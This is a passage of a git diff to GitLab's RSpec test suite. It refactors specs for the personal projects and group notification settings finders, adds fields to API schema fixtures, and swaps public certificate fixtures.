"%#{package1.name[3..-1]}" } + let(:package_name) { "%#{package1.name[3..]}" } it { is_expected.to match_array([package1, package2]) } end diff --git a/spec/finders/personal_projects_finder_spec.rb b/spec/finders/personal_projects_finder_spec.rb index 493ec0e569e..af3b5bf894b 100644 --- a/spec/finders/personal_projects_finder_spec.rb +++ b/spec/finders/personal_projects_finder_spec.rb @@ -3,14 +3,16 @@ require 'spec_helper' RSpec.describe PersonalProjectsFinder do - let(:source_user) { create(:user) } - let(:current_user) { create(:user) } - let(:finder) { described_class.new(source_user) } + let_it_be(:source_user) { create(:user) } + let_it_be(:current_user) { create(:user) } + let_it_be(:admin) { create(:admin) } + + let(:finder) { described_class.new(source_user) } let!(:public_project) do - create(:project, :public, namespace: source_user.namespace, updated_at: 1.hour.ago) + create(:project, :public, namespace: source_user.namespace, updated_at: 1.hour.ago, path: 'pblc') end - let!(:private_project) do + let!(:private_project_shared) do create(:project, :private, namespace: source_user.namespace, updated_at: 3.hours.ago, path: 'mepmep') end @@ -18,8 +20,12 @@ RSpec.describe PersonalProjectsFinder do create(:project, :internal, namespace: source_user.namespace, updated_at: 2.hours.ago, path: 'C') end + let!(:private_project_self) do + create(:project, :private, namespace: source_user.namespace, updated_at: 3.hours.ago, path: 'D') + end + before do - private_project.add_developer(current_user) + private_project_shared.add_developer(current_user) end describe 'without a current user' do @@ -29,18 +35,26 @@ RSpec.describe PersonalProjectsFinder do end describe 'with a current user' do - subject { finder.execute(current_user) } - context 'normal user' do - it { is_expected.to eq([public_project, internal_project, private_project]) } + subject { finder.execute(current_user) } + + it { is_expected.to match_array([public_project, internal_project, private_project_shared]) } end context 'external' do + subject { finder.execute(current_user) } + before do current_user.update!(external: true) end - it { is_expected.to eq([public_project, private_project]) } + it { is_expected.to match_array([public_project, private_project_shared]) } + end + + context 'and searching with an admin user', :enable_admin_mode do + subject { finder.execute(admin) } + + it { is_expected.to match_array([public_project, internal_project, private_project_self, private_project_shared]) } end end end diff --git a/spec/finders/user_group_notification_settings_finder_spec.rb b/spec/finders/user_group_notification_settings_finder_spec.rb index b9d800d8e55..ea44688bc8d 100644 --- a/spec/finders/user_group_notification_settings_finder_spec.rb +++ b/spec/finders/user_group_notification_settings_finder_spec.rb @@ -11,155 +11,167 @@ RSpec.describe UserGroupNotificationSettingsFinder do subject.map(&proc).uniq end - context 'when the groups have no existing notification settings' do - context 'when the groups have no ancestors' do - let_it_be(:groups) { create_list(:group, 3) } - - it 'will be a default Global notification setting', :aggregate_failures do - expect(subject.count).to eq(3) - expect(attributes(&:notification_email)).to eq([nil]) - expect(attributes(&:level)).to eq(['global']) + shared_examples 'user group notifications settings tests' do + context 'when the groups have no existing notification settings' do + context 'when the groups have no ancestors' do + let_it_be(:groups) { create_list(:group, 3) } + + it 'will be a default Global notification setting', :aggregate_failures do + expect(subject.count).to eq(3) + expect(attributes(&:notification_email)).to match_array([nil]) + expect(attributes(&:level)).to match_array(['global']) + end end - end - context 'when the groups have ancestors' do - context 'when an ancestor has a level other than Global' do - let_it_be(:ancestor_a) { create(:group) } - let_it_be(:group_a) { create(:group, parent: ancestor_a) } - let_it_be(:ancestor_b) { create(:group) } - let_it_be(:group_b) { create(:group, parent: ancestor_b) } - let_it_be(:email) { create(:email, :confirmed, email: 'ancestor@example.com', user: user) } + context 'when the groups have ancestors' do + context 'when an ancestor has a level other than Global' do + let_it_be(:ancestor_a) { create(:group) } + let_it_be(:group_a) { create(:group, parent: ancestor_a) } + let_it_be(:ancestor_b) { create(:group) } + let_it_be(:group_b) { create(:group, parent: ancestor_b) } + let_it_be(:email) { create(:email, :confirmed, email: 'ancestor@example.com', user: user) } - let_it_be(:groups) { [group_a, group_b] } + let_it_be(:groups) { [group_a, group_b] } - before do - create(:notification_setting, user: user, source: ancestor_a, level: 'participating', notification_email: email.email) - create(:notification_setting, user: user, source: ancestor_b, level: 'participating', notification_email: email.email) - end + before do + create(:notification_setting, user: user, source: ancestor_a, level: 'participating', notification_email: email.email) + create(:notification_setting, user: user, source: ancestor_b, level: 'participating', notification_email: email.email) + end - it 'has the same level set' do - expect(attributes(&:level)).to eq(['participating']) - end + it 'has the same level set' do + expect(attributes(&:level)).to match_array(['participating']) + end - it 'has the same email set' do - expect(attributes(&:notification_email)).to eq(['ancestor@example.com']) + it 'has the same email set' do + expect(attributes(&:notification_email)).to match_array(['ancestor@example.com']) + end + + it 'only returns the two queried groups' do + expect(subject.count).to eq(2) + end end - it 'only returns the two queried groups' do - expect(subject.count).to eq(2) + context 'when an ancestor has a Global level but has an email set' do + let_it_be(:grand_ancestor) { create(:group) } + let_it_be(:ancestor) { create(:group, parent: grand_ancestor) } + let_it_be(:group) { create(:group, parent: ancestor) } + let_it_be(:ancestor_email) { create(:email, :confirmed, email: 'ancestor@example.com', user: user) } + let_it_be(:grand_email) { create(:email, :confirmed, email: 'grand@example.com', user: user) } + + let_it_be(:groups) { [group] } + + before do + create(:notification_setting, user: user, source: grand_ancestor, level: 'participating', notification_email: grand_email.email) + create(:notification_setting, user: user, source: ancestor, level: 'global', notification_email: ancestor_email.email) + end + + it 'has the same email and level set', :aggregate_failures do + expect(subject.count).to eq(1) + expect(attributes(&:level)).to match_array(['global']) + expect(attributes(&:notification_email)).to match_array(['ancestor@example.com']) + end end - end - context 'when an ancestor has a Global level but has an email set' do - let_it_be(:grand_ancestor) { create(:group) } - let_it_be(:ancestor) { create(:group, parent: grand_ancestor) } - let_it_be(:group) { create(:group, parent: ancestor) } - let_it_be(:ancestor_email) { create(:email, :confirmed, email: 'ancestor@example.com', user: user) } - let_it_be(:grand_email) { create(:email, :confirmed, email: 'grand@example.com', user: user) } + context 'when the group has parent_id set but that does not belong to any group' do + let_it_be(:group) { create(:group) } + let_it_be(:groups) { [group] } - let_it_be(:groups) { [group] } + before do + # Let's set a parent_id for a group that definitely doesn't exist + group.update_columns(parent_id: 19283746) + end - before do - create(:notification_setting, user: user, source: grand_ancestor, level: 'participating', notification_email: grand_email.email) - create(:notification_setting, user: user, source: ancestor, level: 'global', notification_email: ancestor_email.email) + it 'returns a default Global notification setting' do + expect(subject.count).to eq(1) + expect(attributes(&:level)).to match_array(['global']) + expect(attributes(&:notification_email)).to match_array([nil]) + end end - it 'has the same email and level set', :aggregate_failures do - expect(subject.count).to eq(1) - expect(attributes(&:level)).to eq(['global']) - expect(attributes(&:notification_email)).to eq(['ancestor@example.com']) + context 'when the group has a private parent' do + let_it_be(:ancestor) { create(:group, :private) } + let_it_be(:group) { create(:group, :private, parent: ancestor) } + let_it_be(:ancestor_email) { create(:email, :confirmed, email: 'ancestor@example.com', user: user) } + let_it_be(:groups) { [group] } + + before do + group.add_reporter(user) + # Adding the user creates a NotificationSetting, so we remove it here + user.notification_settings.where(source: group).delete_all + + create(:notification_setting, user: user, source: ancestor, level: 'participating', notification_email: ancestor_email.email) + end + + it 'still inherits the notification settings' do + expect(subject.count).to eq(1) + expect(attributes(&:level)).to match_array(['participating']) + expect(attributes(&:notification_email)).to match_array([ancestor_email.email]) + end end - end - context 'when the group has parent_id set but that does not belong to any group' do - let_it_be(:group) { create(:group) } - let_it_be(:groups) { [group] } + it 'does not cause an N+1', :aggregate_failures do + parent = create(:group) + child = create(:group, parent: parent) - before do - # Let's set a parent_id for a group that definitely doesn't exist - group.update_columns(parent_id: 19283746) - end + control = ActiveRecord::QueryRecorder.new do + described_class.new(user, Group.where(id: child.id)).execute + end - it 'returns a default Global notification setting' do - expect(subject.count).to eq(1) - expect(attributes(&:level)).to eq(['global']) - expect(attributes(&:notification_email)).to eq([nil]) - end - end + other_parent = create(:group) + other_children = create_list(:group, 2, parent: other_parent) - context 'when the group has a private parent' do - let_it_be(:ancestor) { create(:group, :private) } - let_it_be(:group) { create(:group, :private, parent: ancestor) } - let_it_be(:ancestor_email) { create(:email, :confirmed, email: 'ancestor@example.com', user: user) } - let_it_be(:groups) { [group] } + result = nil - before do - group.add_reporter(user) - # Adding the user creates a NotificationSetting, so we remove it here - user.notification_settings.where(source: group).delete_all - - create(:notification_setting, user: user, source: ancestor, level: 'participating', notification_email: ancestor_email.email) - end + expect do + result = described_class.new(user, Group.where(id: other_children.append(child).map(&:id))).execute + end.not_to exceed_query_limit(control) - it 'still inherits the notification settings' do - expect(subject.count).to eq(1) - expect(attributes(&:level)).to eq(['participating']) - expect(attributes(&:notification_email)).to eq([ancestor_email.email]) + expect(result.count).to eq(3) end end + end - it 'does not cause an N+1', :aggregate_failures do - parent = create(:group) - child = create(:group, parent: parent) - - control = ActiveRecord::QueryRecorder.new do - described_class.new(user, Group.where(id: child.id)).execute - end + context 'preloading `emails_disabled`' do + let_it_be(:root_group) { create(:group) } + let_it_be(:sub_group) { create(:group, parent: root_group) } + let_it_be(:sub_sub_group) { create(:group, parent: sub_group) } - other_parent = create(:group) - other_children = create_list(:group, 2, parent: other_parent) + let_it_be(:another_root_group) { create(:group) } + let_it_be(:sub_group_with_emails_disabled) { create(:group, emails_disabled: true, parent: another_root_group) } + let_it_be(:another_sub_sub_group) { create(:group, parent: sub_group_with_emails_disabled) } - result = nil + let_it_be(:root_group_with_emails_disabled) { create(:group, emails_disabled: true) } + let_it_be(:group) { create(:group, parent: root_group_with_emails_disabled) } - expect do - result = described_class.new(user, Group.where(id: other_children.append(child).map(&:id))).execute - end.not_to exceed_query_limit(control) + let(:groups) { Group.where(id: [sub_sub_group, another_sub_sub_group, group]) } - expect(result.count).to eq(3) + before do + described_class.new(user, groups).execute end - end - end - - context 'preloading `emails_disabled`' do - let_it_be(:root_group) { create(:group) } - let_it_be(:sub_group) { create(:group, parent: root_group) } - let_it_be(:sub_sub_group) { create(:group, parent: sub_group) } - - let_it_be(:another_root_group) { create(:group) } - let_it_be(:sub_group_with_emails_disabled) { create(:group, emails_disabled: true, parent: another_root_group) } - let_it_be(:another_sub_sub_group) { create(:group, parent: sub_group_with_emails_disabled) } - let_it_be(:root_group_with_emails_disabled) { create(:group, emails_disabled: true) } - let_it_be(:group) { create(:group, parent: root_group_with_emails_disabled) } + it 'preloads the `group.emails_disabled` method' do + recorder = ActiveRecord::QueryRecorder.new do + groups.each(&:emails_disabled?) + end - let(:groups) { Group.where(id: [sub_sub_group, another_sub_sub_group, group]) } + expect(recorder.count).to eq(0) + end - before do - described_class.new(user, groups).execute + it 'preloads the `group.emails_disabled` method correctly' do + groups.each do |group| + expect(group.emails_disabled?).to eq(Group.find(group.id).emails_disabled?) # compare the memoized and the freshly loaded value + end + end end + end - it 'preloads the `group.emails_disabled` method' do - recorder = ActiveRecord::QueryRecorder.new do - groups.each(&:emails_disabled?) - end + it_behaves_like 'user group notifications settings tests' - expect(recorder.count).to eq(0) + context 'when feature flag :linear_user_group_notification_settings_finder_ancestors_scopes is disabled' do + before do + stub_feature_flags(linear_user_group_notification_settings_finder_ancestors_scopes: false) end - it 'preloads the `group.emails_disabled` method correctly' do - groups.each do |group| - expect(group.emails_disabled?).to eq(Group.find(group.id).emails_disabled?) # compare the memoized and the freshly loaded value - end - end + it_behaves_like 'user group notifications settings tests' end end diff --git a/spec/fixtures/api/schemas/deployment.json b/spec/fixtures/api/schemas/deployment.json index ac37dd084d3..fa34a61c7d3 100644 --- a/spec/fixtures/api/schemas/deployment.json +++ b/spec/fixtures/api/schemas/deployment.json @@ -7,6 +7,7 @@ "iid", "tag", "last?", + "is_last", "ref", "id" ], @@ -16,6 +17,7 @@ "id": { "type": "integer" }, "iid": { "type": "integer" }, "last?": { "type": "boolean" }, + "is_last": { "type": "boolean" }, "ref": { "type": "object", "required": [ diff --git a/spec/fixtures/api/schemas/pipeline_schedule.json b/spec/fixtures/api/schemas/pipeline_schedule.json index cdb4aea76da..ef5942b7eb3 100644 --- a/spec/fixtures/api/schemas/pipeline_schedule.json +++ b/spec/fixtures/api/schemas/pipeline_schedule.json @@ -14,6 +14,7 @@ "type": ["object", "null"], "properties": { "id": { "type": "integer" }, + "iid": { "type": "integer" }, "project_id": { "type": "integer" }, "sha": { "type": "string" }, "ref": { "type": "string" }, diff --git a/spec/fixtures/clusters/ca_certificate.pem b/spec/fixtures/clusters/ca_certificate.pem deleted file mode 100644 index 9e6810ab70c..00000000000 --- a/spec/fixtures/clusters/ca_certificate.pem +++ /dev/null @@ -1,23 +0,0 @@ ------BEGIN CERTIFICATE----- -MIIDxTCCAq2gAwIBAgIQAqxcJmoLQJuPC3nyrkYldzANBgkqhkiG9w0BAQUFADBs -MQswCQYDVQQGEwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3 -d3cuZGlnaWNlcnQuY29tMSswKQYDVQQDEyJEaWdpQ2VydCBIaWdoIEFzc3VyYW5j -ZSBFViBSb290IENBMB4XDTA2MTExMDAwMDAwMFoXDTMxMTExMDAwMDAwMFowbDEL -MAkGA1UEBhMCVVMxFTATBgNVBAoTDERpZ2lDZXJ0IEluYzEZMBcGA1UECxMQd3d3 -LmRpZ2ljZXJ0LmNvbTErMCkGA1UEAxMiRGlnaUNlcnQgSGlnaCBBc3N1cmFuY2Ug -RVYgUm9vdCBDQTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAMbM5XPm -+9S75S0tMqbf5YE/yc0lSbZxKsPVlDRnogocsF9ppkCxxLeyj9CYpKlBWTrT3JTW -PNt0OKRKzE0lgvdKpVMSOO7zSW1xkX5jtqumX8OkhPhPYlG++MXs2ziS4wblCJEM -xChBVfvLWokVfnHoNb9Ncgk9vjo4UFt3MRuNs8ckRZqnrG0AFFoEt7oT61EKmEFB -Ik5lYYeBQVCmeVyJ3hlKV9Uu5l0cUyx+mM0aBhakaHPQNAQTXKFx01p8VdteZOE3 -hzBWBOURtCmAEvF5OYiiAhF8J2a3iLd48soKqDirCmTCv2ZdlYTBoSUeh10aUAsg -EsxBu24LUTi4S8sCAwEAAaNjMGEwDgYDVR0PAQH/BAQDAgGGMA8GA1UdEwEB/wQF -MAMBAf8wHQYDVR0OBBYEFLE+w2kD+L9HAdSYJhoIAu9jZCvDMB8GA1UdIwQYMBaA -FLE+w2kD+L9HAdSYJhoIAu9jZCvDMA0GCSqGSIb3DQEBBQUAA4IBAQAcGgaX3Nec -nzyIZgYIVyHbIUf4KmeqvxgydkAQV8GK83rZEWWONfqe/EW1ntlMMUu4kehDLI6z -eM7b41N5cdblIZQB2lWHmiRk9opmzN6cN82oNLFpmyPInngiK3BD41VHMWEZ71jF -hS9OMPagMRYjyOfiZRYzy78aG6A9+MpeizGLYAiJLQwGXFK3xPkKmNEVX58Svnw2 -Yzi9RKR/5CYrCsSXaQ3pjOLAEFe4yHYSkVXySGnYvCoCWw9E1CAx2/S6cCZdkGCe -vEsXCS+0yx5DaMkHJ8HSXPfqIbloEpw8nL+e/IBcm2PN7EeqJSdnoDfzAIJ9VNep -+OkuE6N36B9K ------END CERTIFICATE----- diff --git a/spec/fixtures/clusters/chain_certificates.pem b/spec/fixtures/clusters/chain_certificates.pem index b8e64d58ee7..fe6affec17a 100644 --- a/spec/fixtures/clusters/chain_certificates.pem +++ b/spec/fixtures/clusters/chain_certificates.pem @@ -1,100 +1,86 @@ -----BEGIN CERTIFICATE----- -MIIItjCCB56gAwIBAgIQCu5Ga1hR41iahM0SWhyeNjANBgkqhkiG9w0BAQsFADB1 -MQswCQYDVQQGEwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3 -d3cuZGlnaWNlcnQuY29tMTQwMgYDVQQDEytEaWdpQ2VydCBTSEEyIEV4dGVuZGVk -IFZhbGlkYXRpb24gU2VydmVyIENBMB4XDTE5MTIwNDAwMDAwMFoXDTIxMTIwODEy -MDAwMFowgb0xHTAbBgNVBA8MFFByaXZhdGUgT3JnYW5pemF0aW9uMRMwEQYLKwYB -BAGCNzwCAQMTAlVTMRUwEwYLKwYBBAGCNzwCAQITBFV0YWgxFTATBgNVBAUTDDUy -OTk1MzctMDE0MjELMAkGA1UEBhMCVVMxDTALBgNVBAgTBFV0YWgxDTALBgNVBAcT -BExlaGkxFzAVBgNVBAoTDkRpZ2lDZXJ0LCBJbmMuMRUwEwYDVQQDEwxkaWdpY2Vy -dC5jb20wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDAeRYb/RLbljGZ -IB//DrEdyKYMQqqaJwBlrr3t2paAWNuDJizvVkTMIzdJesI1pA58Myenxp5Dp8GJ -u/VhBf//v/HAZHUE4xwu104Fg6A1BwUEKgVKERf+7kTt17Lf9fcMIjMyL+FeyPXb -DOFbH+ej/nYaneFLch2j2xWZg1+Thk0qBlGE8WWAK+fvbEuM0SOeH9RkYFCNGPRS -KsLn0GvaCnnD4LfNDyMqYop0IpaqXoREEnkRv1MVSOw+hBj497wnnO+/GZegfzwU -iS60h+PjlDfmdCP18qOS7tRd0qnfU3N3S+PYEd3R63LMcIfbgXNEEWBNKpiH9+8f -eXq6bXKPAgMBAAGjggT3MIIE8zAfBgNVHSMEGDAWgBQ901Cl1qCt7vNKYApl0yHU -+PjWDzAdBgNVHQ4EFgQUTx0XO7HqD5DOhwlm2p+70uYPBmgwggGjBgNVHREEggGa -MIIBloIMZGlnaWNlcnQuY29tggl0aGF3dGUuZGWCC2ZyZWVzc2wuY29tggxyYXBp -ZHNzbC5jb22CDGdlb3RydXN0LmNvbYIJdGhhd3RlLmZyggp0aGF3dGUuY29tghB3 -d3cucmFwaWRzc2wuY29tghB3d3cuZ2VvdHJ1c3QuY29tgg13d3cudGhhd3RlLmZy -gg13d3cudGhhd3RlLmRlgg53d3cudGhhd3RlLmNvbYIQd3d3LmRpZ2ljZXJ0LmNv -bYIYa2ItaW50ZXJuYWwuZGlnaWNlcnQuY29tghprbm93bGVkZ2ViYXNlLmRpZ2lj -ZXJ0LmNvbYIWa25vd2xlZGdlLmRpZ2ljZXJ0LmNvbYIPa2guZGlnaWNlcnQuY29t -ghlrbm93bGVkZ2VodWIuZGlnaWNlcnQuY29tghh3ZWJzZWN1cml0eS5kaWdpY2Vy -dC5jb22CFGNvbnRlbnQuZGlnaWNlcnQuY29tgg93d3cuZnJlZXNzbC5jb22CHHd3 -dy53ZWJzZWN1cml0eS5kaWdpY2VydC5jb20wDgYDVR0PAQH/BAQDAgWgMB0GA1Ud -JQQWMBQGCCsGAQUFBwMBBggrBgEFBQcDAjB1BgNVHR8EbjBsMDSgMqAwhi5odHRw -Oi8vY3JsMy5kaWdpY2VydC5jb20vc2hhMi1ldi1zZXJ2ZXItZzIuY3JsMDSgMqAw -hi5odHRwOi8vY3JsNC5kaWdpY2VydC5jb20vc2hhMi1ldi1zZXJ2ZXItZzIuY3Js -MEsGA1UdIAREMEIwNwYJYIZIAYb9bAIBMCowKAYIKwYBBQUHAgEWHGh0dHBzOi8v -d3d3LmRpZ2ljZXJ0LmNvbS9DUFMwBwYFZ4EMAQEwgYgGCCsGAQUFBwEBBHwwejAk -BggrBgEFBQcwAYYYaHR0cDovL29jc3AuZGlnaWNlcnQuY29tMFIGCCsGAQUFBzAC -hkZodHRwOi8vY2FjZXJ0cy5kaWdpY2VydC5jb20vRGlnaUNlcnRTSEEyRXh0ZW5k -ZWRWYWxpZGF0aW9uU2VydmVyQ0EuY3J0MAwGA1UdEwEB/wQCMAAwggF8BgorBgEE -AdZ5AgQCBIIBbASCAWgBZgB1AKS5CZC0GFgUh7sTosxncAo8NZgE+RvfuON3zQ7I -DdwQAAABbtLkOs4AAAQDAEYwRAIgQ7gh393PInhYfPOhg/lF9yZNRdvjBeufFoG8 -VnBuPNMCIBP8YGC83ig5ttw3ipSRjH0bKj4Ak5O4rynoql9Dy8x3AHYAVhQGmi/X -wuzT9eG9RLI+x0Z2ubyZEVzA75SYVdaJ0N0AAAFu0uQ7VgAABAMARzBFAiEAhzE7 -1c48wn3s/30IB4WgxfpLburH0Ku8cchv8QeqcgACIBrWpUlDD18AOfkPCOcB2kWU -vRXsdptVm3jPeU5TtDSoAHUAu9nfvB+KcbWTlCOXqpJ7RzhXlQqrUugakJZkNo4e -0YUAAAFu0uQ60gAABAMARjBEAiBBpH5m7ntGKFTOFgSLcFXRDg66xJqerMy0gOHj -4TIBYAIgfFABPNy6P61hjiOWwjq73lvoEdAyh18GeFHIp0BgsWEwDQYJKoZIhvcN -AQELBQADggEBAInaSEqteyQA1zUKiXVqgffhHKZsUq9UnMows6X+UoFPoby9xqm6 -IaY/77zaFZYwXJlP/SvrlbgTLHAdir3y38uhAlfPX4iRuwggOpFFF5hqDckzCm91 -ocGnoG6sUY5mOqKu2vIcZkUQDe+K5gOxI6ME/4YwzWCIcTmBPQ6NQmqiFLPoQty1 -gdbGCcLQNFCuNq4n5OK2NmBjcbtyT4gglat7C4+KV8RkEubZ+MkXzyDkpEXjjzsK -7iuNB0hRgyyhGzHrlZ/l0OLoT0Cb4I5PzzRSseFEyPKCC1WSF7aE9rFfUqhpqSAT -7NV7SEijYyFFtuZfz9RGglcqnRlAfgTy+tU= +MIIGYzCCBUugAwIBAgIQAaQHyOeT/PBR4ioLKYneZDANBgkqhkiG9w0BAQsFADBY +MQswCQYDVQQGEwJCRTEZMBcGA1UEChMQR2xvYmFsU2lnbiBudi1zYTEuMCwGA1UE +AxMlR2xvYmFsU2lnbiBBdGxhcyBSMyBEViBUTFMgQ0EgSDIgMjAyMTAeFw0yMTEw +MTgxODUwMDRaFw0yMjExMTkxODUwMDNaMBsxGTAXBgNVBAMMEGFib3V0LmdpdGxh +Yi5jb20wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDWSo0eziN/0lq5 +dIcS7ZceJw2odzZeT0tRkcKEW8iagNul6JetrFlk6h5lxoLEu35+MK6/fWHNmt7u +eQk7HS0uRipskAzeGrL1Hvk8EjIcHXXTxpRu7JqWOu7ZSXwNxW5cqn7L9/N2gYwt +Jg/sfkv9AFQiNOdKrarKfbcBstxmra6rQbh5ggLG5UBT23N4ZrA3XnzvEx3+GjtO +u/a5izbk7FQP3gyXKyfm/SQRpNsytYa9jJqu5Hmyzfap5KaueOJbtJEOk8dR/HWR +i/gmAUevq62MNxorYbz8YU/P1468tS7iORkD31Tc2QWCMQSPya5qGaCGnz7dVgWy +E1xTPbBXAgMBAAGjggNkMIIDYDAbBgNVHREEFDASghBhYm91dC5naXRsYWIuY29t +MA4GA1UdDwEB/wQEAwIFoDAdBgNVHSUEFjAUBggrBgEFBQcDAQYIKwYBBQUHAwIw +HQYDVR0OBBYEFJFVruwpjWeUfGJXl3m5grAjhAwPMFcGA1UdIARQME4wCAYGZ4EM +AQIBMEIGCisGAQQBoDIKAQMwNDAyBggrBgEFBQcCARYmaHR0cHM6Ly93d3cuZ2xv +YmFsc2lnbi5jb20vcmVwb3NpdG9yeS8wDAYDVR0TAQH/BAIwADCBngYIKwYBBQUH +AQEEgZEwgY4wQAYIKwYBBQUHMAGGNGh0dHA6Ly9vY3NwLmdsb2JhbHNpZ24uY29t +L2NhL2dzYXRsYXNyM2R2dGxzY2FoMjIwMjEwSgYIKwYBBQUHMAKGPmh0dHA6Ly9z +ZWN1cmUuZ2xvYmFsc2lnbi5jb20vY2FjZXJ0L2dzYXRsYXNyM2R2dGxzY2FoMjIw +MjEuY3J0MB8GA1UdIwQYMBaAFCo0uar6vzyI8Ufy0hJ4vsXlqrBpMEgGA1UdHwRB +MD8wPaA7oDmGN2h0dHA6Ly9jcmwuZ2xvYmFsc2lnbi5jb20vY2EvZ3NhdGxhc3Iz +ZHZ0bHNjYWgyMjAyMS5jcmwwggF+BgorBgEEAdZ5AgQCBIIBbgSCAWoBaAB3AG9T +dqwx8DEZ2JkApFEV/3cVHBHZAsEAKQaNsgiaN9kTAAABfJS9R5YAAAQDAEgwRgIh +AOOZmc41vB2ICwkwEB5Bmpm/X8UHfjbxwrCXEdeRmO+qAiEAg/JugZIrG2PeV4bA +Gm6rry7HUfB954bQJ4p0PeQVmwsAdABGpVXrdfqRIDC1oolp9PN9ESxBdL79SbiF +q/L8cP5tRwAAAXyUvUeOAAAEAwBFMEMCHyRAiTz2fZ8DuQF6hrVP+IMTCPBtjB3D +m4naI8tC/foCIDXFCRIYjRb00CFI6piLYGihRy+GYF5nMQhQ9uE6hltzAHcAUaOw +9f0BeZxWbbg3eI8MpHrMGyfL956IQpoN/tSLBeUAAAF8lL1ICgAABAMASDBGAiEA +5d/bXb9TPZWhwSH8GGji/LDFL6OJnZtOV94sBaDiFgMCIQCtl00oCRMFFnqsvBo6 +SRtnDqJkEHYBS12I4LyC+D1onjANBgkqhkiG9w0BAQsFAAOCAQEAE5xcno79J+Ec +DIPJKnJCugKiM7yKjCjCp/63osCbRC+jUwRyXBIe/oTdY3geKwDOQAvyEeJPSWP1 +LbNp0l3yHbYXfsYl/NMTrJpjrJrrRO5BxG/d3IPwXIlcZrrdDSoGfGYIF9N23iqB +in15L7B+PodTl8/mSQZTjbLoecPvl+AOcLyStcWCKYQUlQb3x4UV3R4Z1ukwGbBC +cDbTR2XOSJzA9ECJcxKnWjQRQUc54pdG3pt13Wu2dVapX5sWZpV05rga3bBDjCqw +DcfKuYbOChm2i6CQ578lAntPTIS02EkGFHrmYxrIAvlhGksHpJNJtRoff1KkQKni +r8emWp7D2Q== -----END CERTIFICATE----- -----BEGIN CERTIFICATE----- -MIIEtjCCA56gAwIBAgIQDHmpRLCMEZUgkmFf4msdgzANBgkqhkiG9w0BAQsFADBs -MQswCQYDVQQGEwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3 -d3cuZGlnaWNlcnQuY29tMSswKQYDVQQDEyJEaWdpQ2VydCBIaWdoIEFzc3VyYW5j -ZSBFViBSb290IENBMB4XDTEzMTAyMjEyMDAwMFoXDTI4MTAyMjEyMDAwMFowdTEL -MAkGA1UEBhMCVVMxFTATBgNVBAoTDERpZ2lDZXJ0IEluYzEZMBcGA1UECxMQd3d3 -LmRpZ2ljZXJ0LmNvbTE0MDIGA1UEAxMrRGlnaUNlcnQgU0hBMiBFeHRlbmRlZCBW -YWxpZGF0aW9uIFNlcnZlciBDQTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoC -ggEBANdTpARR+JmmFkhLZyeqk0nQOe0MsLAAh/FnKIaFjI5j2ryxQDji0/XspQUY -uD0+xZkXMuwYjPrxDKZkIYXLBxA0sFKIKx9om9KxjxKws9LniB8f7zh3VFNfgHk/ -LhqqqB5LKw2rt2O5Nbd9FLxZS99RStKh4gzikIKHaq7q12TWmFXo/a8aUGxUvBHy -/Urynbt/DvTVvo4WiRJV2MBxNO723C3sxIclho3YIeSwTQyJ3DkmF93215SF2AQh -cJ1vb/9cuhnhRctWVyh+HA1BV6q3uCe7seT6Ku8hI3UarS2bhjWMnHe1c63YlC3k -8wyd7sFOYn4XwHGeLN7x+RAoGTMCAwEAAaOCAUkwggFFMBIGA1UdEwEB/wQIMAYB -Af8CAQAwDgYDVR0PAQH/BAQDAgGGMB0GA1UdJQQWMBQGCCsGAQUFBwMBBggrBgEF -BQcDAjA0BggrBgEFBQcBAQQoMCYwJAYIKwYBBQUHMAGGGGh0dHA6Ly9vY3NwLmRp -Z2ljZXJ0LmNvbTBLBgNVHR8ERDBCMECgPqA8hjpodHRwOi8vY3JsNC5kaWdpY2Vy -dC5jb20vRGlnaUNlcnRIaWdoQXNzdXJhbmNlRVZSb290Q0EuY3JsMD0GA1UdIAQ2 -MDQwMgYEVR0gADAqMCgGCCsGAQUFBwIBFhxodHRwczovL3d3dy5kaWdpY2VydC5j -b20vQ1BTMB0GA1UdDgQWBBQ901Cl1qCt7vNKYApl0yHU+PjWDzAfBgNVHSMEGDAW -gBSxPsNpA/i/RwHUmCYaCALvY2QrwzANBgkqhkiG9w0BAQsFAAOCAQEAnbbQkIbh -hgLtxaDwNBx0wY12zIYKqPBKikLWP8ipTa18CK3mtlC4ohpNiAexKSHc59rGPCHg -4xFJcKx6HQGkyhE6V6t9VypAdP3THYUYUN9XR3WhfVUgLkc3UHKMf4Ib0mKPLQNa -2sPIoc4sUqIAY+tzunHISScjl2SFnjgOrWNoPLpSgVh5oywM395t6zHyuqB8bPEs -1OG9d4Q3A84ytciagRpKkk47RpqF/oOi+Z6Mo8wNXrM9zwR4jxQUezKcxwCmXMS1 -oVWNWlZopCJwqjyBcdmdqEU79OX2olHdx3ti6G8MdOu42vi/hw15UJGQmxg7kVkn -8TUoE6smftX3eg== +MIIExTCCA62gAwIBAgIQeimFGrf0XWZ5UGZBtv/XHTANBgkqhkiG9w0BAQsFADBM +MSAwHgYDVQQLExdHbG9iYWxTaWduIFJvb3QgQ0EgLSBSMzETMBEGA1UEChMKR2xv +YmFsU2lnbjETMBEGA1UEAxMKR2xvYmFsU2lnbjAeFw0yMTA2MTYxMjAwMDBaFw0y +NDA2MTYwMDAwMDBaMFgxCzAJBgNVBAYTAkJFMRkwFwYDVQQKExBHbG9iYWxTaWdu +IG52LXNhMS4wLAYDVQQDEyVHbG9iYWxTaWduIEF0bGFzIFIzIERWIFRMUyBDQSBI +MiAyMDIxMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA1JTAQMj+QUYF +3d9X5eOWFOphbB6GpHE3J0uvUXcQwxnd8Jz26aQCE1ZYxJFEc2WmsxuVeVXU+rZj +7+MYD7Mg72bhuiwUdwRGRN4a2N122LfIQlTFlHu/fwcNqYX/fe3phvZt9upnH4oJ +aLBbay+t+HPPC4em74x2WKaIl31ZXzgzllLomnlLISLOKiQe1rEHp4yy3/yE2a4G +1l/lprA49dcyM/oylm9Bbkum2F4C+EOjHgTAoDVJrJpdWvPj0CU+HkmftujfFp4S +55LECSr2TfJt7xjgR3eLUx12nlpoauWEzZ0/i6OIDPfbmqcksw4ani/YO07LbRM6 